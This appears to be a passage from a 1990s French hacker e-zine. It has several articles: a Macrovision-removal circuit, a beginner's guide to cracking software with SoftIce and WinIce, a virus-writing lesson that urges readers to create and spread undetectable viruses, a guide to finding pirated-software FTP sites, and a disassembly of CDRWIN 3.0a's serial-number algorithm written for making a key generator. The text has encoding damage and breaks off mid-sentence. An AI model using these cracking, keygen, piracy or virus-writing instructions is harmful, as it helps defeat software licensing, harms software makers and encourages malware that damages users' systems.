(dimension:75mm*67mm voir MVISION2.GIF … imprimer (scann‚ a 200 dpi)). Il possŠde une entr‚e et une sortie SCART o— il faudras y brancher respectivement la sortie du scope lecteur et l'entr‚e du scope enregistreur. Pour savoir … quel fil correspond le signal entr‚e ou sortie SCART,voici un petit sh‚ma d'une fiche SCART (aussi appel‚e fiche PERITEL): ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\ ³ 1 3 5 7 9 11 13 15 17 19 21 \ ³ 2 4 6 8 10 12 14 16 18 20 \ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ\ Voil…,en gros ;-) une fiche PERITEL . L'ENTR‚E SCART est la broche Nø20 et la SORTIE la Nø19 Pour alimenter ce circuit,il vous faudras 2 alimentations. L'une de 5 volts, l'autre de 12 volts. La consomation du circuit ne doit gŠre depasser les 150 mA .Vos alims doivent ˆtres stables et bien regul‚es  Un conseil au cas ou vous auriez du mal … trouver un ou plusieurs composants chez le cremier de votre ville : potassez les pubs des revues electronique et commandez les en VPC (… Paris,y'a tout normalement !) Liste des composants: U1 : LM1881 Sync seperate U2 : 74HC4538 U3 : 74HC02 U4 : 74HC4316 C1 : 1.5n Silver Mica Q1 : 2N3904 C2 : 2.2n Silver Mica R1 : 300 Kohms C3 : 4.7y Polyester (important !) R2 : 390 Kohms C4 : 100n R3 : 75 ohms C5 : 100n R4 : 620 ohms C6 : 560p R5 : 680 Kohms C7 : 47y R6 : 1 Kohms C8 : 220p R7 : 10 Kohms C9 : 100p R8 : 10 Kohms C10 : 1000y R9 : 120 ohms Voil… que ce termine ce seul et unique article sur le fa‡on de virer la Macrovision des cassettes video. C'est vrais quoi ! dej… 3 pages pour parler de ‡…,c'est plutot balaise,en fesant trainer le sujet et tout et tout ... Si vous voulez un article plus long,moi je veux bien  je peux vous parler du chien de ma grand-mŠre qui est presque aussi malade quelle,ce qui est dej… tres grave,vu son etat. Si on fait rien,il va mourrir le pauvre ... A mon avis,faudrais penser a la piquer, la grand-mŠre, sinon,il va pas survivre le pauv' ptit toutou ... Ok,OK ! j'arrete !!! Et que cet article ne vous serve pas a copier les cassettes copyright‚es !!! MAD666 ******************************************************************************* ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Debuter en Crack ³ ³ Dos ou Windows ? ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ par ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ÀÄÄÄÄÄÄÄSaMSoNÄ[Mj13/Dsk]ÄÄÄÄÄÄÙ ³ ³ ³ ³ A tous les combattants de l'ombre ³ ³ J'adresse un message d'espoir ³ ³ Pour que leur Fronde ³ ³ Se transforme un jour en victoire! ³ ³ Molodoi. ³ ³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ ³ 1. Introduction ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ 2. Les points communs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ 3. Specificites Dos ³ ³ 4. Specificites Windows ³ ³ 5. Conclusion ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 1. Introduction ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ On m'a souvent pose la question:"Pour debuter en crack, par quoi je dois commencer: Dos ou Windaube ?". Et la, je me suis trouve tres con pour expli- quer en deux mots ce que j'en pensait. Voila donc un petit article pour cla- rifier les choses. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 2. Les points communs ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Softice (debugger Dos) et Winice (debugger Win) ont le meme look, a deux trois details pres, peu importants. Softice est en mode 16 bits alors que Winice 95 est en mode 32 bits, ce qui modifie un poil les mnemoniques, mais franchement, ca change pas grand chose pour nous. Le code source est toujours en Assembleur (Saint Langage qui en rebute plus d'un :). Au niveau des instructions pour les debuggers, elles restent souvent identiques en ce qui concerne les breakpoints, les editions de regi- stres, la modification du code source, etc... On retrouve encore le loader qui permet de debugger un soft des le debut de son code source: Wldr sous Win et Ldr.exe pour Softice. Une petites correspondance des principales touches de fonction Softice/Win- ice: Action Winice Softice ------------------------------------------- Trace over F10 F8 (p) Trace in F8 F7 (t) Relance du soft F5 F9 jusqu'a BP Changement F6 F12 Code/instructions Voir ecran en F4 RS cours Avec Softice, vous pouvez reconfigurer les touches avec l'instruction FKEY. sous Winice, j'ai pas verifie, mais ca doit etre possible. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 3. Specificites Dos ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Un des principaux avantages de Softice, est qu'on peut faire un Breakpoint "a la volee": un petit Ctrl-D et hop! directement dans le code source du programme debugge a l'endroit ou il est rendu (pour Windows, voir 3). C'est tres pratique: par exemple, on peut faire un BP juste avant la demande de code pour pouvoir ensuite faire du pas a pas et mieux isoler la routine... Une autre specificite DOS, c'est qu'on peut mettre des Breakpoints sur les interruptions (BPINT) ce que l'on peux faire sous Win, mais qui me semble inutile (euh, si je me trompe --> email!). Passons aux problemes qui peuvent se poser sous Dos. Vous avez cracke un soft, vous recherchez les chaines hexadecimales et vous ne les trouvez dans aucun fichier! C'est probablement que le fichier est compresse: le fichier se decompresse "en route" pour gagner de la place et faire chier les crackers debutants. Il existe des compresseurs d'executa- bles classiques: Lzexe, Pklite, Diet, etc... Dans ce cas la, il faut utili- ser un decompresseur: UNP 4.11 (cardware) est celui que j'utilise le plus because il reconnait un grand nombre de formats. MAIS cela ne marche pas pour tous les softs. En effet, certaines boites utilisent une compression "maison", qui n'est pas reconnue par Unp ou un autre du meme style. La, pas de mystere, il faut utiliser un patch resident. Un resident, c'est un petit programme qui se charge en memoire qui modifie le programme pendant son exe- cution en memoire et qui permet de le patcher. Vous pouvez en faire vous me- me en asm ou utiliser Spoke (freeware) qui est un residant configurable as- sez efficace. Mais j'aborderai surement le cas des residents dans un pro- chain article. L'un des principaux emmmerdements sous Dos sont les programmes en mode pro tege: les fameux DOS4GW et autres. Je ne suis pas un maitre de ces trucs, mais en gros il permettent de faire un programme en 32 bits en s'affranchis- sant des problemes de memoire specifiques au Dos (merci Billou!). Le proble- me, c'est que Softice ne supporte pas du tout les programmes qui utilisent le mode protege. Alors il faut utiliser Watcom Debugger pour les softs qui utilisent le DOS4GW, et ce debugger, c'est pas un modele de puissance. Une autre astuce consiste a passer par une session Dos de Windows95. La, c'est un peu long a expliquer ici (surtout que je ne masterise pas du tout le mode protege, je n'ai que quelques "astuces" :( ) J'essairai donc (ou un autre membre, de vous donner quelques trucs dans un prochain article. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 4. Specificites Windows ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ La principale difficulte presentee par le debugging sous Windows, c'est la pose des Breakpoints. Sous Dos, un Ctrl-D et vous etes dans le code source, en direct. Sous Windows (3.x ou 95), quand vous faites un Ctrl-D, vous avez 1/13223145456677656^32 chance de vous retrouver a l'endroit ou vous voudriez etre: a l'endroit precis du code source ou en est le programme a cracker. Vous etes dans des putains de procedures Windows, a cause du multitache. Et ca, ben c'est deroutant au depart. Donc, la solution c'est de poser des Breakpoints sur des procedures Win u- tilisees par le programme, le plus proche possible de l'endroit a debugger. Par exemple, pour une boite de dialogue a supprimer, un "BPX DIALOGBOXPARAM" peut s'averer pas mal. Pour une "messagebox", un petit "BPX MESSAGEBOX" a des chances de vous aider. Et il y en a une sacree tripotee de fonctions Windows! Une autre solution, c'est de debugger le programme a partir du debut avec Wldr si le soft a deplomber s'y prette (boite de dialogue au lancement). Mais ces fonctions de Windows ont un avantage: elles simplifient le code source du programme, ce qui fait que tres souvent, les procedures d'enregis- trement, sans etre identiques, se ressemblent (mais vous inquietez pas, sous Windows aussi, y'a des programmeurs vicieux). Cela permet surtout d'acquerir certains reflexes en voyant des suites d'instructions qui sautent aux yeux une fois qu'on a un peu d'experience. Ah, oui, j'oubliais: pas la peine d'essayer de cracker des softs program- mes avec Visual Basic avec Winice. Vous pouvez reconnaitre ces softs parce qu'ils demandent les dll Vbrun100, Vbrun200,etc... En effet, les fichiers .exe de ces softs ne sont que des appels aux fonctions contenues dans les DLL si bien que vous vous retrouvez dans des boucles a la con en permanence. La seule solution qu'il y ait a ma connaissance soit un decompilateur speci- fique aux progammes Visual Basic, mais je n'ai pas approfondi. Mais ne vous inquietez pas: 999/100, les programmes Visual Basic, c'est de la daube :). ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 5. Conclusion ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Une conclusion? Merde, qu'est ce que je vais bien pouvoir leur dire ??? Ce article etait surtout fait pour donner une idee generale de la difference entre debugger sous Dos et sous Windows. Bien que Windows puisse faire peur au depart, c'est a mon avis injustifie. Il faut s'y faire au depart, mais ca reste assez logique dans l'ensemble et pas forcement plus dur a debugger que sous DOS ou il n'y a pas deux programmes qui se ressemblent. A part ca, ben, comme d'habitude: accrochez vous! Moi il m'a quand meme fallu pas mal de temps pour faire mon premier crack a peu pres propre. Pour me contacter, voyez mon autre article. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ Samson [Mj13/Dsk] ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Initiation au VIRUS, cours 1 ³ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ par ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄ<< :)---> UnK MnemoniK :)>ÄÄÙ )> Quelques notions de base --------------------------- Avant toutes diffusions de parties ou de sources de virus , j'ai tenu a mettre deux trois choses au point 1> Qu'est-ce qu'un virus ??? << Ohhh mon dieux >>, c'est ce que j'ai entendu depuis que j'en fais , cependant un virus ne signifie pas la mort du systeme , ni le chaos total du diskque dur (ni la perte de la fat ) Les virus sont a la base des simples programmes mignon tout plein, s'auto-copiant sans avertir l'utilisateur , comme une bacille , son but principal est de se reproduire une fois ce but atteint , le virus fera quelques actions au bon vouloir du programmeur qui l'as con‡us. types de virii : j'en ai class‚ (:Virii , pluriel de virus) 1) Les recover-virus : ces virus ont pour originalit‚e d'ˆtre trŠs petit mais aussi trŠs cons car ils r‚‚crivent leurs codes sur les progs sans tenir compte du programme lui meme , ca tourne tout le temp au plantage royal et l'user vas donc lancer l'a-v , le plus c'est que le programme infect‚ est irr‚cup‚rable 2) Les r‚sidents : ce sont les plus beau a mon avis , ce sont des programmes qui peuvent agir en arriŠre plan , ils sont lanc‚ a partir d'un virus executable , une fois en m‚moire , le virus peut se copier a son gr‚ tenant tout de fois compte de ne pas g‚ner l'user,ce qui rend ces virus extremement contagieux ,imaginez vous entrain de faire un dir , la , innocamment , le virus vient d'infect‚ 3 nouveaux fichiers , au bout de 10 minutes pass‚e sous dos , un disque peut etre TOTALEMENT infect‚ sans que l'user ne s'apercoive de quoiquesesoit. 3) Les infecteurs d'executable :ces virus s'attachent au programme lui meme , ils se copient et puis repasse le controle au programme d‚mand‚ , mode de propagation trŠs r‚pendu car assez facile a r‚laiser . 4) les infecteur du boot :ces virus s'‚cutent au lancement du boot ce mode de propagation est assez int‚r‚ssant du fait qu'il n'est pas d‚rang‚ par le systeme d'exploitation , donc il infectera un systeme unix aussi bien qu'un system os/2 aussi bien qu'un systeme dos. 5) Divers : Toute une rimbabelle de virus se sont sp‚cialis‚s dans divers style , par exemple des virus infecte des fichiers doc (comment ??? : simple , les fichiers doc contiennent des progs , car on peut attacher des progs a un doc grace aux ole , je salue celui qui en a eu l'id‚e ) , ya aussi les vers , virus qui se balladent dans les r‚seaux , des infecteurs de fichiers OBJ,Sys... 2> Creer ses virus pourquoi creer son virus ??? Les virus que vous pourrez trouver seront d‚t‚ctable , bref > ca termine en couille . Les virus cr‚‚ par des g‚n‚rateurs sont tous reconnus et meme leur variente , bref > ca sert a rien je voudis. Le seul moyen de distribuer un virus est de le creer soi meme ; -Oui mais comment on fait ?( avec la voix naze ) Il faut les programmers en assembleur -Oui mais moi je connais que le basic c'est con ca car pour pouvoir faire un virus dans des conditions acceptable, il faut un language de trŠs bas niveau , l'assembleur s'impose , les autres languages genre deplhi , pascal ,... ne sont pas dutout adapt‚ a ce genre de manipulation ,ceci dit j'en ai deja vu en C et en C assembleur mais trŠs rares sont-ils. -Ok , l'assembleur ca se mange comment ? L'A86 est un compilateur shareware , mais il est trŠs peu utilis‚ dans les virii qui sont le plus souvent compil‚ en TASM (<^ý=- WaReZ oblige -=ý^>) -C'est dur a faire ? Non c'est pas dur , bien sur , vous ne ferez pas des gros masterboot tout de suite , je vous montrerais des Executables et chaque fois une nouvot‚e pour l'am‚liorer , des routines int‚r‚ssente , etcetc -Et si je veux le tester mes virus ??? faites le sur des bornes isol‚es , le vieux 286 du grenier avec son disque de 40 megs fera l'affaire , de cette maniŠre , vous pourrez toujours controler votre virus (comme dans les films , 1 virus lach‚ dans la nature si il est trŠs contagieux sera totallement incontrolable ) Tips: - J'utilise le norton commander du dos, ca facilite bocoup l'‚dition de ces virus , - lisez les issues 1-14 de 40Hex et ceux de VLAD , ils sont trŠs pointus sur les nouvelles maniŠres d'infections mais ils fournissent les codes Hexa et assembleur de virus (: , In Inglich ,,, - vous pouvez toujours reprendre des sous-fonctions pour autant que celle ci ne soient dans les premiers octets du virus car ceux-ci sont utilis‚s pour la d‚sinfection . About Me -------- Je traine souvent sur le net , si vous etes sur aol , lancez un m‚ssage ‚clair … VGeNeRaLV , sinon je passe mon temp sur kali a jouer sous le nom de General3 , je suis parfois sur l'IRC mais trŠs rarement , sur L'udernet . Mail me at : zorohack@hotmail.com D‚diKaCEs: Faucon , Uther , Stork , Aries , Fade , Knuck , Till , Flavor , Lithium , SoS , Arnold , JAYCEuWZ , HxMajor , WzEuRoPe , Jayce , Yak , HuMaNBOmb , Magic , Pablo , Zak , Znel , Marave , Mana , Cybertech et toute la clique Prochain episode : un recover-virus comme il faut << :)---> UnK MnemoniK :)> ******************************************************************************* Comment d‚busquer les warez sur le net en 10 le‡ons Ecrit-a-la-va-vite-parce-que-j'ai-pas-le-temps. par Shybe ************************************* ************************************ Je vais donc ‚noncer dans ce document les methodes les plus connues pour trouver facilement ce qui est le plus croustillant pour nous: les warez. 1) Introduction: Il n'y a pas si longtemps, Internet ‚tait un r‚seau r‚serv‚ aux professionnels. On ne trouvait pratiquement que des donn‚es scientifiques. De nos jours toutes sortes de bidochons se baladent sur le Web et Internet est en train de devenir un merveilleux foutoir ou l'on trouve pratiquement ce qu'on veut. Le probleme est de savoir OU trouver ce qui nous interesse. D'abord un peu de vocabulaire pour les d‚butants: -Warez: Terme d‚signant un logiciel croustillant. C'est … dire sympa, cool, interessant, registered, pompable, jouable et nouveau. -Appz, Gamez, Sitez: termes d‚signants respectivement: Applications warez, Jeux warez, Sites FTP warez (ne riez pas y'en a qui ne comprenent pas bien l'anglais.) -Oldiez ou Oldies: G‚n‚ralement les vieux jeux et applications. -"This site sucks!": "Ce site suce!" ou "ce site est nul!" g‚neralement ‚crit par quelqu'un qui vient de fouiller sur un site FTP sois-disant warez et qu'en fait le site est vide ou ne contient que des oldiez ou des merdes. Si vous voyez ca dans un site FTP warez, il y a fort a parier que le site ne vaut pas un clou. -"Fuck U lamerz!": "Allez vous faire enculer, bande de morveux!" Ou plus exactement un message d'injure d'un Elite (vois plus loin) qui grogne parce qu'il n'a pas trouv‚ son bonheur dans un site FTP dit warez. -"Empty site!": Site vide. Ne contient rien ou que des merdes. -"Loaded site!": "Site rempli!" Dit d'un site lorsqu'il contient des warez. -"Fat ass site!": "Site warez gros cul!" ou "site 'poid-lourd!'" En gros: YA BON. Terme g‚n‚ralement utilis‚ par unElite qui a trouv‚ un site FTP warez fantastiquement bourr‚ de warez. Donc a essayer en premier. La soci‚t‚ sur le net par ordre croissant d'importance: -Lamerz: On est dit lamer lorsqu'on pompe par exemple impun‚ment 20 mo de warez sur un site FTP sans envoyer quoi que ce soit. Sur le net, tout le monde traite tout le monde de lamer. C'est en fait une espece de coutume. Un lamer est en fait un synonime p‚joratif de "d‚butant". -Trader: Un gars appartenant a un "groupe de warez" (distributeur de warez payant ou pas) qui est charg‚ de vendre ou d'‚changer les warez. Les traders sont en g‚n‚ral consid‚r‚s de haut par les "‚lites" (voir ci-dessous) car ils se tapent le sale boulot. Ce sont en fait des "dealers" de warez. -Elite: Un bien grand mot pour d‚signer les pros, la "haute soci‚t‚" de la micro dans les coders, crackers et autres hackers. On est generalement dit ‚lite lorsqu'on fait partie d'un groupe de traders. Les gars qui se disent ‚lite sont dans 90% des cas des craneurs qui aiment dire "j'ai des warez et j'en ai autant que j'en veux." dans les newgroups. Remarque importante: Les 10% de vrai "membres ‚lite" ne parlent JAMAIS d'eux et ne se font pas remarquer. --> Dans la pratique, un ‚lite est un type capable de d‚busquer SOIS-MEME ses warez sans ˆtre oblig‚ de pleurer dans les chaussettes d'un autre type qui, lui, le peut. (Ce que nous avons tous fait dans nos d‚buts) Nous d‚signeront donc courrament un ‚lite un gars qui cherche des warez. II Methodes de recherche: 1) FTPsearch 3.3: ----------------- Lorsque j'ai commenc‚ a cherche des warez sur le net, j'ai d'abord utilis‚ les moteurs de recherches connus (Alta-vista, Yahoo...). Je me suis vite rendu compte qu'il existait des milliers de sites WWW contenant des listes de sites FTP warez. Malheureusement, je me suis aussi vite rendu compte que beaucoup n'‚tait pas … jour, ou que les FTP ne marchaient plus. Il m'a donc fallu chercher d'autres moyens de trouver des sites frais. Un jour j'ai entendu parler de FTP-Search 3.3. (ftpsearh.ntnu.no) FTP-Search est surement le moteur de recherche de FTP le plus puissant sur le net: Il suffit de chercher un mot clef, et s'il trouve ce mot DANS L'ADDRESSE d'un site r‚pertori‚, hop on a la r‚ponse. Il est donc facile, en th‚orie de trouver des sites warez! Il suffirait de chercher des noms de repertoires se trouvant courrament dans les sites pour tomber sur les warez. Le seul probleme, et de taille, c'est que FTPsearch garde souvent en liste des sites p‚rim‚s. On a donc souvent l'IMPRESSION trompeuse d'avoir trouv‚ LE site qui booste et qui tue, mais en fait si on veut pomper, ou mˆme simplement acceder REELLEMENT au site (avec un client FTP), eh ben ‡a marche presque jamais! (comme par exemple ftp.gpl.net, un site qui A existe il y a quelque temps, et qui contenait un gros morceau, mais qui a malheureusement ferm‚!) FTPsearch garde en memoire le contenu des sites A UN MOMENT DONNE, ce qui fausse completement l'id‚e qu'on peut avoir de son v‚ritable contenu! (Voir des fichiers qui n'existent plus depuis longtemps, ou encore ne pas voir des fichiers qui viennent d'appara‹tre!) IL EST DONC IMPERATIF, AVANT TOUT EXCITATION SOUDAINE, de VERIFIER l'‚tat du site: en pratique cliquer sur l'addresse complete en bleu dans FTPsearch. (avec netscape ou explorer) Si le site ne r‚pond pas, c'est rap‚. S'il r‚pond, vous pouvez commencer … en pisser de joie. Pour une recherche ais‚e, il faut savoir bien configurer FTPsearch: 1) Passer en mode "expression match" (donne une simple liste contenant uniquement les mots-cl‚e se rapprochant le plus du votre, pratique pour trier rapido) 2) R‚gler l'ordre d'affichage de fa‡on … avoir la taille VISIBLE (en premier par exemple. C'est important: ca permet de trier rapidement les fichiers en fonction de leur taille: si vous trouver un "quakefull.zip" qui fait 3 ko par exemple, on peut ˆtre sur que ‡a n'est pas la commerciale! 3) R‚gler l'ordre d'affichage sur "date, host and name" de fa‡on a avoir les sites les plus r‚cents (et donc les plus susceptible de contenir quelque-chose) en HAUT de la liste. 4) SAUVEGARDER LA CONFIG! (sinon rebelotte, et c'est chiant a la longue) --> Je vais maintenant faire une liste non exaustive des mots clefs les plus utilis‚s dans les sites, ou dans les noms de r‚pertoires: ( "_" d‚signe un ESPACE ) .wrz wrz .apz apz .warez warez .appz appz .gamez gamez .sitez sitez .oldiez oldiez .reqz reqz ou reqs ou required serialz crackz stuffes ou stuffz iRC ) iRC96 ) ou .iRC??? iRC'96 ) .nwc ou .NwC ou NwC etc... fate96 risc ... _. _.. _... etc... Il est aussi intelligent de chercher: uploaded by upload by upped by (le plus courrant) up by reqz filled by filled by Ou pour des warez amiga: ------ amiga-warez amiwarez .amiwrz amiwrz aaa a-warez Regardez dans les r‚pertoires: .unreadable unreadable test (je sais y'en a beaucoup, mais ca vaut le coup!) .temp temp --> Les groupes de warez: nous recherchons ici les fichiers communs acompagnant les warez en g‚n‚ral: fate.nfo | irc96.nfo fate96.nfo | razor.nfo ror.nfo | risc.nfo dod.nfo | tdu.nfo ucf.nfo | tdujam.nfo ucf.com /.exe | tdujam.exe --> Les extensions de fichiers: .arj / .a01 etc... .r00 / .r01 etc... .000 / .001 (TDUjam) .dms (pour les warez amiga) .lzx (idem) --> Les entˆtes de fichiers: ( … coupler avec les extensions ) tdu-*.* tdu*.* ror*.* dod-*.* dod*.* rsc*.* *ucf.* Le mieux est de chercher des noms de fichiers appartenant a des warez connues et r‚pandues, par exemple: dn3d.* dn3d13r.* duke3d.* duke3dr.* quake101.zip ou arj/a01 etc... quakefull.* z.arj psp40.arj ou zip psp311r.* gw32r.zip (game wizard 32 :)) ) photoshop.* Pour les amigafans: tvpaint*.lzx dpaintV.lzx dc-*.* et dc-lw4.* ou dc-lw5c.* (lighwave 4 ou 5 bc) real3d.* etc etc... Faites jouer votre imagination! Essayez aussi, si vous cherchez quelque chose de pr‚ci, de combiner entˆtes et abr‚g‚s, par exemple: Je cherche Speedy Rom. Dans ce cas on cherche un peu partout et on trouve dodsprom.zip... Remarque: les caractŠres tels que '*' ou '?' ne sont pas reconnus par FTPsearch. Pour utiliser les notations ‚tendues, vous serez oblig‚ d'utiliser la "Regular syntax" qui est diff‚rente de celle utilis‚e par DOS. Exemples de conversion: ? <=3D=3D> . * <=3D=3D> .* Vous trouverez un r‚sum‚ complet de la syntaxe dans l'aide au site de FTPsearch, ou en cliquant sur "syntax" qui est en surbrillance si mes souvenirs sont bons. Bon avec ‡a vous devriez pouvoir trouver … peu prŠs 1 site warez par jour! 2) Les listes de sites: ----------------------- Il est assez facile de trouver des listes de sites warez dans les r‚pertoires "sitez" des sites warez d‚ja trouv‚s. Le probleme, toujours le mˆme: les mises … jours. Les sites warez ne durant g‚n‚ralement pas longtemps (1 a 2 jours pour les warez PC et une a deux semaines pour les warez AMIGA) il est imp‚ratif de trouver des listes contenant des sites datant du jour mˆme. Pour cela: trois solutions: 1) De loin la plus facile: Aller sur mon site, dans mes linkz, et fouiller dans la section "warez FTP listz". Vous trouverez surement 2 ou 3 sites contenant des listes de FTP class‚s par date. (certains sont mˆme mis-a-jour 2 ou 3 fois par jour!!!) Par exemple: www.netwarez.com, section WAREZ. (excellent, ce site, d'ailleur) 2) Chercher avec FTPsearch ou autre moteur de recherche des fichiers genre... 0-day.txt 0day.txt 0daywrz.txt 0.day 0day.wrz etc... ou: siteZ.* sitelist.* sitezlst.* (extensions txt/doc/nfo etc...) ...ou mˆme des fichiers comme WS_FTP.INI qui contiennent des listes de sites compatibles avec Ws_ftp. Si WS_FTP.INI se trouve dans un r‚pertoire zarbi genre _.. ou sitez, pas de doute! 3) Ce qu'on appelle dans notre jargon "trader en IRC" C'est-a-dire ‚changer des listes de sites contre d'autres listes, ou des warez. Par exemple dans les channels comme #warez666 chez undernet.org, on peut souvent trouver des addresses IP de sites appartenant a des particuliers... Vous lui envoyez quelque-chose qu'il cherche et il vous file l'acces... III La machine infernale: Comme vous avez pu le voir, lorsqu'on trouve un site warez, on trouve aussi de temps en tmeps des listes d'autres sites FTP. Il est donc assez facide de maintenir quelques sites toujours … dispo pour trouver ce qu'on veut. Le mot de la fin: J'espere qu'avec tous ces trucs vous trouverez votre bonheur... Cependant n'oubliez pas que vous n'=ˆtes pas seul a pomper sur un site FTP, pensez aux autres: remplissez les "reqz". Perso, je laisse un repertoire genre Upped by -=3D Shybe =3D- shybe@geocities.com. Comme ‡a il arrive qu'on se fasse des potes sur un site, et qu'on ‚change des listes etc... A vos modems Amicalement -=3D S H Y B E =3D- NB: D‚sol‚ pour l'aurtaugraf. ******************************************************************************* | TRACAGE DE CRWIN3.0a | | CREATION DE REGISTER | | PAR | | DONGLE KILLER | | ALLIGATOR427 | ****************************************************************************** Voici donc le tracage de CDRWIN 3.0a, qui vous permets de trouver les BPX du premier coup... le calcul restera le meme sur toutes les versions suivantes, vous permettant d'avoir votre registrer... sorry Jeff... Nous l'avons trac‚ tous les 2, a des moments et endroits differents... rendons ces lauriers a cesar, qui a pouss‚ le "vice" en creeant un KEY-REGIS. Bravo DONGLE!!! ****************************************************************************** 0137:00406345 CALL 0043789D Renvoie eax=3Dlongueur du nom 0137:00406354 CALL 0043789D Renvoie eax=3Dlongueur email 0137:00406363 CALL 0043789D Renvoie eax=3Dlongueur code 0137:0040636C CALL 00424960 Renvoie eax=3Dvaleur hexa du code 0137:00406378 PUSH EAX Sauvegarde de la valeur du code en pile 0137:00406381 CALL 00411E10 V‚rification du code D‚tail de la v‚rif. : 0137:00411E22 CALL 00412150 V‚rification si code ok, alors eax<>0 -------------------------------------------------------- D‚tail du CALL 00412150 les adresses du nom, email et code ont ‚t‚ empil‚e juste avant l'appel!! 0137:00412150 MOV EDX,[ESP+04] EDX pointe sur le NOM 0137:00412160 REPNZ SCASB On recherche la fin de chaine NOT ECX DEC ECX ECX=3DLongueur du nom CMP ECX,06 Longueur inf‚rieure =… 6 caracs ? 0137:0041216A MOV EBX,[ESp+14] EBX pointe sur l'email ....idem : v‚rif longueur.... -------------------------------------------------------- 0137:00412183 PUSH EDX On empile l'adresse du nom CALL 004121E0 Calcule un code un partir du nom nom= Vous choisirez.. eax=xxxxxxxxxxx .... .... PUSH EBX on empile l'adresse de l'email OR EDI,ESI Inversion de la partie haute=20 et de la partie basse de eax par rotations et addition finale R‚sultat dans ESI !!! 0137:0041219B CALL 004121E0 Calcule un code … partir de l'email (grace a l'adresse empil‚e avant) email= vous choissirez! eax=xxxxxxxxxx XOR EDI,EAX OU EXCLUSIF des 2 r‚sulats nom et email EDI=xxxxxxxxxx en base 10 EDI=xxxxxxxxxxx < le code est la!!!! La suite r‚cup‚re la valeur du code saisi qui avait ‚t‚ empil‚e bien avant et la compare a la valeur ci-dessus. -------------------------------------------------------- # Routine calcul register : ....d‚tails oubli‚s.... EBX pointe sur la chaine ECX =3D longueur chaine DI =3D longueur chaine 0137:00419199 XOR EDX,EDX EDX=3D0=20 0137:0041919B MOV DL,[EBX]=09 Lecture premier carac. exemple : DL=3D50 carac. 'P' INC EBX Pointe sur carac. suivant MOV ECX,EDX SHR EDX,02 2 d‚calages … droite sur EDX 0101 0000 --> 0001 0100 =3D 14 XOR ECX,EAX OU exclusif entre eax et ecx dans ecx.=20 SHR EAX,04 4 d‚calages … droite de eax AND ECX,0F Et logique sur ECX, on garde les 4 bits de poids faible MOV ECX,[ECX*4+ESI] XOR ECX,EAX Ou exclusif entre ecx et eax LEA EAX,[EXCX*4+0000000] EAX=3DECX*4 SHR ECX,04 4 d‚calages … droite de ecx XOR EAX,EDX Ou exclusif entre ecx et edx AND EAX,3C ET logique sur eax bits 5,4,3,2 conserv‚s MOV EAX,[ESI+EAX] Lecture d'un code dans une table point=E9e par ESI+EAX EAX maxi =3D 3C (cf AND 3C), la table aura donc 16 mots de 32 bits XOR EAX,ECX Ou exclusif entre eax et ecx vers eax DEC DI Test fin de chaine JNZ 419199 Reboucle si pas la fin de chaine Table point‚e par ESI : (cette table est dans 